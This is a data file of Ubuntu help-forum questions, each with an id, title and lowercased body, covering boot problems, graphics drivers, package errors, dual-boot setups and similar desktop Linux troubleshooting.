464807	why so many files in /usr/share/app-install/desktop ?	for 14.04 , i 'm trying out lubuntu lts . if i run ls -l /usr/share/app-install/desktop , i get a list of 3085 .desktop files . all except one are dated apr 18 . the exception is : -rw-r -- r -- 1 root root 6328 mar 28 2013 applications.menu from the dates , it 's clear that all these are installed by default and not by me . does n't each gui-based program bring in its own .desktop file at the time it 's installed ( mostly in /usr/share/applications ) ? then why are these thousands of other .desktop files needed ? from their names , most of them have n't anything to do with lubuntu . their names are different from regular .desktop files ( such as those in /usr/share/applications ) : many , not all , are like name : name.desktop whereas the regular ones are just name.desktop . the ones i looked at all have a line with x-appinstall-popcon=nnn where nnn is a string of digits . i know that popcon `` gathers statistics determining which packages are the most popular with ubuntu users '' . but why is that part of these .desktop files ?
464809	folders randomly locked	i downloaded a movie using headless deluge on my home server from the client interface on my laptop , both server and laptop run ubuntu 14.04 . the movie is downloaded into /var/lib/deluge and then automatically transferred to /mnt/uuid/videos . the problem is the movie folders are being locked by pulseaudio daemon and i ca n't change the permissions or settings or move the folders into other directories . any ideas ?
464814	install ubuntu 14 onto portable hard drive ?	my system : os : windows 8.1 brand : toshiba satellite p55t-a ram : 8gb cpu:2.30 ghz hhd : 618gb free space portable hd : 2tb free space toshiba canvio hard drive . is it possible to install ubuntu 14 on to my portable hard drive ? if so could you list either a link or the steps to do it . i have it burn on a dvd , when i insert the dvd into my laptop and boot from it . it gives me 3 options , install , oem install and one more i ca n't remember . i think it was `` try '' or something . when i clicked on install it just started to install . not sure if that is what 's suppose to happen then it gives me the option ? if you need any other information just let me know . jjgremo @ gmail.com thanks in advance !
464816	xbmc gotham for i386	i currently have installed the beta version of gotham for i386 . i downloaded the latest version released may 4th and the iso is for amd64 , how can i get the i386 version .
464817	how to disable terminal fullscreen padding	when i run vim at full screen mode in gnome-terminal , actually it is not really full screen . there is a little padding on the right and bottom , with the terminal background color . you can reach the original image to see it more clearly . how to fix this ?
464819	how can i open java 's control panel ?	how can i open java 's control panel to change the security settings ?
464820	can anyone offer help with wine and shortcuts in windows apps ?	ok , so , here 's my dilemma : i 've got word , excel , onenote , powerpoint 2010 working like a dream . ois.exe ( windows picture manager ) seems to run -- > but -- > it seems windows shortcuts do n't work too well with wine . for example , onenote tries to automatically re-open files on loading , but since it is looking for my windows drive , the file is hiding in /home/user/windowshdvolume/users/user/documents/onenote/personal and so it does n't work . likewise , i literally can not add shortcuts to windows picture manager , and it also can not seem to find files in the folders that already have shortcuts there . i know wine has some sort of c : drive compatibility layer going , and i am hoping someone can share some insight on the inner workings here . anyone know how this all works ?
464822	bootable iso disk does n't work on acer 1362 laptop	i have a 9-y/o acer 1362lci laptop that i want to convert to a linux machine , since it is no longer useful as a windows machine . i made an iso dvd that is bootable from a win7 desktop , but it hangs on the acer laptop trying to read the iso disk and will not boot . using burned ubuntu 14.04-desktop-i286 distro , and hashes are good . acer has 2gb ram , is pre-loaded with xp , has sp3 . acer bios will not recognize thumb drive , so can not try that method , though another question was asked on this forum which states they were able to use the usb drive . lubuntu 12.04 on acer laptop boots to blank blue screen . i am waiting for a response from this post . i was successful booting from the xp sys boot disk , and norton partition magic disk . i was under the impression that ubuntu would first boot and then analyze the disk to determine if it was capable of being loaded onto the hd , and then ask if you want to create partitions or format . am i wrong in this assumption ? i have not wanted to reformat the hd and then try loading ubuntu iso , though this may be my last resort . any suggestions ?
464825	black screen after upgrade 12.10 now a very simple question	so here is my question : what can i do to prevent this from happening next time i upgrade ubuntu to another version ? here is a long involved saga of reinstalling nvidia drivers resulting in a happy return of a graphical interface . so i 'd like to prevent this pain at the next upgrade . how ? saga ensues : i have recently attempted to upgrade from 12.04lts to 12.10 . ( afterward i found out this was ill-advised , but so be it . ) after the upgrade completed , i boot into an unresponsive black screen with a blinking cursor . here is what i know , and what i have tried . i am not very skilled in this stuff , so let 's take it slow . i can boot into recovery mode and get to a terminal prompt . i have an nvidia graphics card as shown here : $ lspci | grep -i nvidia 02:00.0 vga compatible controller : nvidia corporation g98 [ quadro nvs 295 ] ( rev a1 ) i have downloaded nvidia-linux-x86_64-331.67.run which i believe to be the correct driver . i do have a 64 bit system . running that gave issues with the nouveau kernel driver . these seemed to be solved by run sudoedit /etc/modprobe.d/nvidia-graphics-drivers.conf and fill it with this : this file was installed by nvidia-current-updates do not edit this file manually blacklist nouveau blacklist lbm-nouveau blacklist nvidia-173 blacklist nvidia-96 blacklist nvidia-current blacklist nvidia-173-updates blacklist nvidia-96-updates alias nvidia nvidia_current_updates alias nouveau off alias lbm-nouveau off re-running nvidia-linux-x86_64-331.67.run results in an error saying that the complier used to compile the kernel gcc 4.6 does not match the current compiler . answering `` no '' to this question seems to continue the installation . what the hell ? i said no . this results in another error `` unable to find kernel source tree '' '' installation has failed '' ok , is this fixable or is it time to bail out and install linux fresh from a live cd ? soldiering on per the instructions here : blank screen after installing nvidia restricted driver sudo nvidia-settings -- uninstall this resulted in an error message that there was no such option as -- uninstall . i was not able to find any uninstall option in nvidia-settings -- help so i ignored it . sudo apt-get remove -- purge nvidia* sudo apt-get remove -- purge xserver-xorg-video-nouveau xserver-xorg-video-nv sudo apt-get install nvidia-common sudo apt-get install xserver-xorg-video-nouveau message : unmet dependencies depends xserver-xorg-core recommends libg11-mesa-dri sudo apt-get install xserver-xorg-core libg11-mesa-dri message : unable to locate package libg11-mesa-dri sudo apt-get install xserver-xorg-video-nouveau message : unmet dependencies depends xserver-xorg-core recommends libg11-mesa-dri unable to correct problems - you have held broken packages ignoring this , i try sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core reconfigure x-server : sudo dpkg-reconfigure xserver-xorg looks like this worked , i am back at a graphical interface . so here is my question : what can i do to prevent this from happening next time i upgrade ubuntu to another version ?
464827	query - ubuntu boot up time & app launch times	i 'm running ubuntu 14.04 on a dell vostro 1500 centrino duo core ( circa 2008 ) . when i upgraded to 13.04 last year i noticed boot-ups were taking longer than before and boot-up times have n't improved with subsequent upgrades . i 'm wondering how typical are my boot-up times compared to other users ? to get from the grub screen to the ubuntu desktop takes 1 minute and 12 seconds : grub to log-in panel : 42 s log-in panel to desktop : 30 s also , launching firefox takes 20 seconds . i 'd be interested to know what other users are experiencing ?
464832	crashes when copying files , no media or boot device . many problems , help	i was installing ubuntu and when it got to the `` copying files '' part , it was taking a while . everything but the installer was responsive . after a while a message popped up saying the installer crashed . everything but the desktop background went away , a message then popped up saying an error occurred and was common for usb problems , and to use a different port or usb stick . it was weird , because i was using an install dvd . i checked before burning , and the md5sum was correct . also the dvd check from boot found one error , but it says it fixed it . this happened twice , but after removing the disk and trying again , this happened again . i took out the disk and tried to boot up on the drive , and it wo n't boot up . a message comes on after the dell symbol ( with no loading symbol ) . it says `` checking media '' , waits `` checking media [ fail ] '' and agin . then it changes to bigger fonts and says `` no boot device found . press any key to reboot the machine '' and repeats after rebooting . as you can see , i have a mess of problems . using ubuntu 14.4 64 bit dell , inspiron 15 .
464833	add 'duplicate file ' to gedit file browser panel right-click menu ?	in textmate and other ide 's like netbeans , there is a right-click option to duplicate a file . is it possible to add this feature in gedit file-browser panel on right click ? currently , i can create new files , folders , delete existing one 's , rename , even 'open terminal here ' . how come we do n't have the 'duplicate file ' option ? from using external tools , i have come up with this script : note : i 'm not that much of a python programmer : - ) # ! /bin/sh docdir= $ gedit_current_document_dir # document directory docnm= $ gedit_current_document_name # document name nnm= $ docnm'_copy ' # append _copy to document name cp `` $ docrir/ $ docnm '' `` $ docdir/ $ nnm '' # duplicate so far , it 's duplicating the file alright though there are some problems i have encountered : index.php is being renamed to index.php_copy = > it should be index_copy.php init.jquery.js should be init_copy.jquery.js the preferrable solution would be to extract the first part of the document name , append '_copy ' and then join it with the last part of the name ( the exension ) . can you improve the script or even create a better one ?
464836	usb lan enter e100u with ubuntu 14.04	the enter usb lan when used with ubuntu 14.04 does not work . the network manager detects the device and tries to connect . but after about 10 sec seconds the the connection is dropped . any body successfully used this device with ubuntu 14.04 may kindly share their experience
464837	black screen on lubuntu install	i bought a new pc . its config is : motherboard : msi h81m-p33 socket 1150 cpu : intel socket 1150 pentium g3320 memory : ddr3 4go 1600 adata 4g 512 ... i tried to install lubuntu 12.10 64bits with a usb key , but the some issues occurs : i boot on usb and i see lubuntu start page with different modes : persistant , live , install . whatever option i choose , i become on a black screen ( but the pc is always on ) . when i try nomodeset , i have lines of code , then a light blue screen ( it displays lubuntu 12.10 ) . finally a terminal appears where i can type anything , and disappear in a few seconds . i also tried noapic , nolapic and acpi=off but it 's the same result : a black screen , or a lubuntu loader and a black screen , or a sequence of colors and a black screen . i specify that windows 8/8.1 options and fast boot were disabled in bios . could you help me ?
464838	update manager says `` the installation or removal of a software package failed ''	i am constantly receiving updates but when i download then , in the end it gives the error message package operation failed . i am not able to figure out what has caused this exactly . i do n't have enough reputation else i would have posted the screenshots ! i have a total disk of 18gigs , out of which 10gigs is free . i tried few methods like following : sudo apt-get autoclean sudo apt-get update sudo apt-get upgrade but it still gives the error message and its irritating . i have attached an image describing more about my problem . plz help me . thanking in advance . the whole error message is : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory setting up firefox ( 28.0+build2-0ubuntu0.12.04.1 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing firefox ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up openjdk-7-jdk ( 7u55-2.4.7-1ubuntu1~0.12.04.2 ) ... no apport report written because maxreports is reached already update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing openjdk-7-jdk ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up samba-common-bin ( 2:3.6.3-2ubuntu2.10 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing samba-common-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already setting up ssh-askpass-gnome ( 1:5.9p1-5ubuntu1.2 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing ssh-askpass-gnome ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already < br > < b > < i > errors were encountered while processing : < br > firefox < br > openjdk-7-jdk < br > samba-common-bin < br > ssh-askpass-gnome < /i > < /b > < br > error in function : setting up ssh-askpass-gnome ( 1:5.9p1-5ubuntu1.2 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing ssh-askpass-gnome ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up samba-common-bin ( 2:3.6.3-2ubuntu2.10 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing samba-common-bin ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up firefox ( 28.0+build2-0ubuntu0.12.04.1 ) ... update-alternatives : error : can not stat file '/usr/bin/java/jdk1.7.0_51/bin/javac ' : not a directory dpkg : error processing firefox ( -- configure ) : subprocess installed post-installation script returned error exit status 2
464839	multiple partitions lubuntu install	i want to install lubuntu on my laptop which has a 20gb ssd and a 300gb hard disk . is there a way to install just /boot onto the ssd and all the other files , like /home onto the hard drive ?
464840	how can i get sd cards to mount automatically even when x isn’t running ?	i have an old laptop with a fresh install of ubuntu 14.04 . the gui is painfully slow , especially when something is animating , so i followed these instructions to prevent the window manager from starting when my computer starts up . when the window manager was running , if i plugged in my usb sd-card reader the card would be mounted automatically . this doesn’t happen when i’m in command-line mode . is there a way to get ubuntu to mount the card automatically even when the window manager isn’t running ?
464843	chroot with specific kernel	i need to build some old drivers with specific kernel version . the kernel 2.6.31-20-generic is needed . i have tried to built it on ubuntu 12.04 and the new one , 14.04 with no success . the only one working is 2.6.31-20 , such answer i get when i asked how to build it . how to make chroot with such version of kernel ?
464844	modifying the ubuntu login process	i am looking to write an alternative implementation of the ubuntu login to take advantage of an external device that supplies the login password . what are good pointers to get started ? are there alternative implementations online that i can look at to get familiar with how the ubuntu login works ? thanks
464850	diodon does not save anything copied to the clipboard	i am on 14.04 and just installed diodon via sudo add-apt-repository ppa : diodon-team/stable sudo apt-get update sudo apt-get install diodon unity-scope-diodon and restarted but when i ctrl+c copy some text , nothing gets saved into the diodon clipboard history . why is this happening ?
464853	ca n't install gnome-shell ?	hello i would like to install gnome-shell , i get this error ! rachid @ dell : ~ $ sudo apt-get install gnome-shell reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell : depends : gir1.2-mutter-3.0 ( > = 3.11.91 ) but 3.10.4-0ubuntu2 is to be installed depends : libmutter0d ( > = 3.11 ) but it is not going to be installed depends : libmutter0d ( < 3.12 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . my ubuntu version rachid @ dell : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty i installed gnome-shell using aptitude bat i stell have some problem like rachid @ dell : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : gir1.2-mutter-3.0 gnome-shell gnome-shell-common mutter-common 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded .
464854	compile ubuntu with universal access	i require compile a version of ubuntu 14.04 with universal access enabled by default , so that from the moment you start the ubuntu installation , this play sounds for a person without visual capacity to perform the installation without problems .
464855	suspend/resume problem	when i run ubuntu from the distro cd ( `` try ubuntu '' ) , suspend and resume works perfectly . when i install ubuntu ( either as the sole os , or along with windows xp ( dual boot ) , i ca n't resume ... presented with textbox asking me to login..but rejects my password . under windows xp , suspend/resume has no problems . from scanning related questions , i suspect that problem is the nvidia driver . same problem when trying redhat linux . my system : 32 bit amd processor nvidia geforce 6150 onboard
464859	ubuntu 14.04 unity wo n't load , no access to terminal	i was working on the system all day on friday and had it logged out for the weekend . this morning when i try to boot ubuntu , i 'm taken to a screen consisting of the default desktop purple-orange and nothing else . i can right click and use the standard options available , but nothing else . i have tried every possible keyboard shortcut for the terminal ( other answers say to run ccsm ) but i ca n't get a terminal to appear . is there another way to get the terminal to show up so i can attempt to fix this ? any other workarounds ?
464860	malware migrating beetween partitions	if i run ubuntu and windows on a single machine in separate partitions , will viruses and other bad migrate between the two operating systems ? in other words , will bad stuff under one os infect the other ?
464862	how to tell javac which libraries to include	so i am trying to run a java file from terminal . but the file is using the apache.commons.io lib , so a simple javac myfile.java does not work here . how do you include the libraries in terminal ?
464865	handbrake-cli updated and now does not work	i updated handbrake-cli using aptitude upgrade , as well as the codecs and now when i try to convert a file it keeps giving me an error `` mp4 muxer disabled '' . does any one know what the problem is ?
464867	symbol 'grub_term_highlight_color ' not found	so i bought a dual boot lubuntu and windows 8.0 pc from my local pc shop ~9 months ago and went to upgrade it to lubuntu 14.04 today . now i have had no boot cd supplied with my installation by the shop . and furthermore those solutions seem to infer the presence of a second ubuntu installation with a broken copy of grub ( which as my pc is pretty much new - 9 months as i said earlier - and to my knowledge has only had this copy of lubuntu ) on is n't the case . so i was wondering if anyone knew of any solutions without having a linux boot cd present and knew why i 'd be experiencing this if i do n't have an older copy of a broken grub installed on my pc ?
464868	update to clamav 0.98.3	i 'm running ubuntu 12.04 lts . upon updating clam definitions with sudo freshclam i got the message that my current clam software ( 0.98.1 ) was outdated and that i should upgrade to 0.98.3. , which i tried to do in many steps ( below ) but was stopped by the error message `` checking for openssl installation/usr '' and then `` configure error : openssl not found '' ; even though spm shows that openssl is installed v 1.01-4 ubuntu 5.13 ! here is what i 've tried so far : uninstalled clamav 0.98.1. downloaded clamav 0.98.3 ; unzipped that folder and then changed directory to that folder and ran in terminal : ./configure . after a minute this process then stops at the above error message about 'openssl not found '' . i 've tried to install clamav 0.98.3 from ubuntu packages with sudo apt-get instal clamav clamav-daemon and clamav-freshclam . i 've tried to install clamav 0.98.3 by first updating my system with sudo apt-get update and sudo apt-get upgrade , and then sudo add-apt-repository ppa : ubuntu-clamav/ppa ' and sudo apt-get upgrade again , and then sudo freshclam again to update the definitions ; all to no avail . i 've since re-installed clamav 0.98.1 because i do n't want to be without an anti-virus protection , even one with outdated definitions . but , i still want to update clamav to 0.98.3 . where did i go wrong and where to i go from here to successfully upgrade/install clamav 0.98.3 ? thanksc
464870	ubuntu 14.04 - boots completely unstable ( 99.9 % frozen )	i have an older hp pavilion from 2007 that i have been trying to get up and running . it originally had ubuntu 13.04 , but i was experiencing crashes where the entire screen would turn into corrupted garbage ( happened twice when trying to install mp3 codec ) . i ran a whole health check on the ram and it passed . i replaced it with crunchbang linux , and it worked fine , but it failed to connect to wireless networks ( the previous ubuntu did ) . so i decided to get the latest ubuntu ( fresh install ) . it installed fine , connected to the wireless network fine as well . it even seemed to boot okay , showing the keyboard shortcuts splash screen . however i could move my mouse all for about half a minute , then it froze . then after about 10 seconds it unfroze to show my mouse 's new position , promptly freezing again . ad infinitum . i ca n't do squat . each time it updated my mouse 's position , it failed to update the clock . it was frozen at 11:01am . it did n't seem like the cpu was doing anything . also happens again after a restart . amd athlon 64 x2 5200+ 3gb ram on-board gpu roughly equivalent to nvidia geforce 6150se tl ; dr fresh install of 14.04 boots frozen and updates mouse every 10 seconds -- as if cpu is extremely busy and overwhelmed , but never goes back to normal . i ca n't do anything at all . ubuntu 13.04 and crunchbang did n't have this problem . any ideas ?
464872	how do you force apt-get source to get the pacakge you ask for	$ apt-get source libtiff4 reading package lists ... done building dependency tree reading state information ... done picking 'tiff3 ' as source package instead of 'libtiff4' e : unable to find a source package for tiff3 if i add -f , it does n't change the behavior . what is causing it to do this and how do i force it to download the package i want ? based on a search , i ca n't even tell where it is getting the idea of tiff3 $ apt-cache search libtiff libtiff-doc - tiff manipulation and conversion documentation libtiff-tools - tiff manipulation and conversion tools libtiff5 - tag image file format ( tiff ) library libtiff5-alt-dev - tag image file format library ( tiff ) , alternative development files libtiff5-dev - tag image file format library ( tiff ) , development files libtiffxx5 - tag image file format ( tiff ) library -- c++ interface gem-plugin-tiff - graphics environment for multimedia - tiff support libtiff-opengl - tiff manipulation and conversion tools libtiff4 - tag image file format ( tiff ) library ( old version ) libtiff4-dev - tag image file format ( tiff ) library ( old version ) , development files libtiffxx0c2 - tag image file format ( tiff ) library ( old version ) -- c++ interface pngtools - series of tools for png ( portable network graphics ) images python-libtiff - wrapper to the libtiff library to python using ctypes
464874	wifi not working installed drivers	hello i 'm new to lubuntu and i 'm currently using an old asus laptop 1,8ghz single core amd and 700~mb ram . and now i 'm trying to get wifi working i 've searched google way too many times and i 've tried everything that i found almost . well i recently re-installed it because i might have done something wrong when i 've tried it too many times but what ever . i wrote sudo apt-get install firmware-b43-installer and downloaded that went to additional drivers installed it from there but nothing rebooted and everything . and also it never shuts down it closes everything and stops at lubuntu loading screen and never shuts down . ( waited 1 hour ) . b4318 the wifi thing . ask if you need more information about the computer . i 've also got some pictures if needed ! ! any help appreciated ! ! !
464877	ubuntu 14.04 sound glitch	checked the forums and couldn’t find a topic related to my current problem . sometimes under heavy sound demand , i.e . playing a game or watching a video my sound has this well , i don’t really know how to describe it but it sounds like a hard lag . but the main sound comes through while the background has this weird echoed , and or lagged um thunder sound , that’s really the best way i can describe . it i always have my headphones in would it be a problem with them or maybe my audio drivers i just have a basic realtek one built into my mother board . thanks for reading again
464881	download file does n't work from gmail webapp in ubuntu 14.04 ?	i thought i would give the new webapps of 14.04 that run in their own browser a chance , so i tried using the gmail web app . i am surprised to find i can not even download attachments -- though i see the normal download buttons and previews of pdfs , etc , the actual 'download ' button does nothing . it also appears that my up/down arrows have no effect in trying to navigate the text composition window . i realize that this is not a 'fully-featured ' browser , but i was rather surprised by these basic limitations . i could n't find a description of others encountering this same issue -- perhaps i have done something wrong ? can anyone replicate this issue ( or if not , suggest how i might debug ? ) i 'm working on a pretty vanilla fresh install of ubuntu 14.04 ...
464883	mount osx drive in ubuntu 14.04	i installed ubuntu 14.04 in a second partition of a imac 21.5 '' . now , i need to access to osx partition but i can not load it into ubuntu ... i have hfsprogs , hfsutils and hfsplus installed inside ubuntu and tried to mount : sudo mount -t hfsplus -o force , rw /dev/sda2 /mnt/osx and the result is : root @ pc : ~ # mount -t hfsplus /dev/sda2 /mnt/osx/ mount : wrong fs type , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so next i tried to validate if the partition is correct and fdisk returns strange information : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 409639 204819+ ee gpt partition 1 does not start on physical sector boundary . /dev/sda2 * 409640 947643135 473616748 da non-fs data /dev/sda3 947643136 948912671 634768 af hfs / hfs+ /dev/sda4 948914176 964538367 7812096 82 linux swap / solaris osx partition ( hfs+ ) has /dev/sda2 but fdisk does not recognizes as this type of partition ... anyone can help me to identify the problem ?
464886	ubuntu 13.10 shows system error dialog and then black screen	i 've bee using ubuntu 13.10 without any problems since about a month ago . yesterday this started : when i boot ubuntu , it shows the usual purple loading screen , then asks for my login , with wallpaper and all , but after that a dialog box with `` system error detected '' and the option to report show . nothing happens if i click report , the dialog just goes away . after that , the option to update to 14.04 shows up too . clicking update now does nothing also . after that there is only a black screen with the cursor . once it did manage to boot halfway , but there was no sidebar or menu bars . i tried opening programs via terminal but it was very slow and chrome crashed . i 'm on a toshiba satellite , basic intel graphics card , very not-fancy laptop . it runs windows normally , so i do n't think it 's a hardware issue . edit i can open the terminal . i 've been trying to configure compiz and enable the unity plugin but when i reboot it remains disabled , and compiz gives me loads of errors . ** edit - solved ** if anyone reaches this page with the same error , i managed to solve my problem : apparently i had mistakely downloaded the fglrx package , which contains drivers for amd graphics cards . what i did was ctrl-alt-t to open the terminal and type sudo apt-get remove fglrx to remove the packages and then sudo reboot if this does n't work , try removing nvidia drivers ( apparently it may be automatically with some libraries or other packages ) : sudo apt-get remove nvidia* and then reboot .
464887	google talk with empathy on trusty tahir ?	when i go to `` system settings '' - > `` online accounts '' and i choose `` add account '' ( `` includes gmail , google docs '' ) .. nothing happens after that - no error messages - its as if it never registered my mouch click . just sits there .
464891	ibus on ubuntu 14.04 japanese not working	i am new to ubuntu ( 14.04 ) and want to type japanese text . i applied language support `` japanese '' and it shows up in the language icon at the page top menue . i installed ibus input pad , also mozc . both show up at the left hand starter and the programs can be opened , but the field `` apply '' is not highlighted . problem being : the input is simply not working at all . what else do i have to do ?
464898	dual boot failed can no longer boot into windows	so i tried to dual boot windows 7 and unbuntu on my dell laptop . i set up all the partitions etc . went into the live cd of ubuntu and installed ubuntu on a seperate unallcated space and finished the installation . now however when i boot up the machine it goes directly into ubuntu and doesnt do grub like i thought it should , help i new to this stuff . perhaps a picture would describe it best . im wonder if because of that goofy 300mb thing at the top it isnt recognizing windows ? idk really want windows back ( for some reason ) . even if i could just access the windows partition , delete the ubunut one and try again ( would that work ? ) . anyways anything helps ! p.s . dont know how to send the picture correctly
464899	ubuntu still shuts down after i plugged my charger in	on kubuntu when my battery is dying and i plug my charger in , it says `` all suspensions have been cancelled . '' on ubuntu or more accurately , unity-based distors , it still shuts down after plug in my laptop to the charger which insanely stupid . how can i change this ?
464902	how to find files in folders ?	without using command line . let 's say i open a folder where i have many sub-folders with different songs and i want to find some song that contain some word in the title . is it possible ? with command line i 'd do it with grep
464905	error in opening grub-customizer	i have installed grub-customizer in my system , kubuntu 14.04 . when i try to start it , i get the following error , ( kindly help ) ... santosh @ santosh-pc : /usr/bin $ sudo ./grub-customizer no protocol specified ** ( grub-customizer:2992 ) : warning ** : could not open x display no protocol specified error : xdg_runtime_dir not set in the environment . ( grub-customizer:2992 ) : gtk-warning ** : can not open display : :0
464912	bootable dvd & usb of centos 6.5 x86 based from ubuntu 13.10	my question is how to make a bootable dvd / usb for centos 6.5 x86 ( 32-bit ) from ubuntu 13.10 ( with the help of terminal / gui or through both ways ) or what softwares i can use for this purpose ? ? ? in addition to this extent , i m interested to know what type of dvd/cd have a property or ability , that i can easily write data on it and after completion of work , i can delete the data written and write something else for other uses of dvd ? if so then please let me know ? thanks
464913	aptana crashes on git commit in 14.04	ever since i upgraded my machine to 14.04 - i can not commit via aptana 's `` team '' menu . i was having other , miscellaneous and unrelated problems , so i did a fresh install , and used oracle java instead , and i would 've sworn to you that worked a couple of days ago . but today , i 'm having the same problem , and i ca n't find out why . this is the error file it leaves behind ( hs_err_pidxxxx.log ) , but i honestly ca n't make sense of it.. i do n't see anything that defines precisely what the problem is ... so i 'm not even sure if it will be helpful ... http : //pastebin.com/zrcf26qs i 've tried : installing tk8.5 python-tk libswt-gtk-3-java git-core the most recent thing i tried was oracle-java7-set-default in case oracle-java7-installer was n't enough . i also ran : $ ulimit -c unlimited to no avail . any light anyone can shed on this would be greatly appreciated ...
464914	can not connect qubee shuttle ( uh235 ) wimax usb modem in ubuntu14.04	i am using qubee shuttle ( uh235 ) wimax usb modem with windows 8.1 which works fine . but when i try to connect it with ubuntu , it can not recognize the modem . i talk with my friends from university , they have this same problem too . they want to use ubuntu but those who are using this modem can not connect to internet in ubuntu . if someone please can give a solution how to use this modem in ubuntu it would be a great help for me . hear some specification of the modem . i am also including some information regarding the modem which i got from windows 8.1
464917	edubuntu 14.04 edubuntu menu editor not opening	i installed edubuntu 14.04 lts on different machines for a testing purpose , but the menu editor is not opening on any of them ; you click and it is not opening at all . however the same icon is working on ubuntu 12.04 test machine
464919	can someone explain this rsync command for me ?	can anybody tell me what this does ? rsync -uva -- delete /srv/bkp01 /srv/offbk2/ > ~/offbkp01.log does it delete bkp01 and offbk2 and sends a log to offbkp01.log ?
464926	how to i change the picture icon for a user in xfce with ubuntustudio or xubuntu 14.04 ?	i want to change the image displayed at login for a user on ubuntustudio 14.04 . i do n't see any option to change this with the users settings gui .
464931	lenovo laptop does not shutdown if anything is connected via usb	i am running ubuntu 14.04 on a lenovo thinkcentre a52 . if i have any device ( even a usb cord ) plugged into my usb sockets , the computer just restarts when i ask it to shutdown . if i remove everything from the usb sockets it shuts down normally . how do i get this resolved ?
464934	skype 4.2 shows incorrect time of contacts at ubuntu 14.04	i am using skype 4.2 in my ubuntu 14.04 system . i am facing a problem at the skype . when i see other contacts time in the chat window or at their profile , it shows wrong time . it calculates the time based on utc+0 , but my timezone is utc+6 . i have checked my system 's timezone : cat /etc/timezone and it shows : asia/dhaka how can i change the skype timezone to my timezone ? i ca n't see any gui option to set timezone .
464935	weired mouse+touchpad functionality in ubuntu + asus x550l	i have an asus x550l . when i try to install ubuntu ( any version ) , my touchpad does not work during the installation and mouse also acts weired such that some buttons can not be clicked with the mouse . however i installed ubuntu using the keyboard . but my cursor periodically moves to left ( about 1cm at once ) . and also the touchpad does not work either . what 's the problem ? can anybody give me a solution ? i have never experienced this issue before in any computer . thank you .
464937	why am i getting runtime error in browser ?	i get the following error message in my browser : server error in '/ ' application . runtime error description : an application error occurred on the server . the current custom error settings for this application prevent the details of the application error from being viewed remotely ( for security reasons ) . it could , however , be viewed by browsers running on the local server machine . details : to enable the details of this specific error message to be viewable on remote machines , please create a < customerrors > tag within a `` web.config '' configuration file located in the root directory of the current web application . this < customerrors > tag should then have its `` mode '' attribute set to `` off '' . < ! -- web.config configuration file -- > < configuration > < system.web > < customerrors mode= '' off '' / > < /system.web > < /configuration > notes : the current error page you are seeing can be replaced by a custom error page by modifying the `` defaultredirect '' attribute of the application 's < customerrors > configuration tag to point to a custom error page url . < ! -- web.config configuration file -- > < configuration > < system.web > < customerrors mode= '' remoteonly '' defaultredirect= '' mycustompage.htm '' / > < /system.web > < /configuration > i 'm not a developer nor do i have any reason to try to modify my network file . just a regular user using my ubuntu machine to surf the web . why am i getting runtime error in browser ?
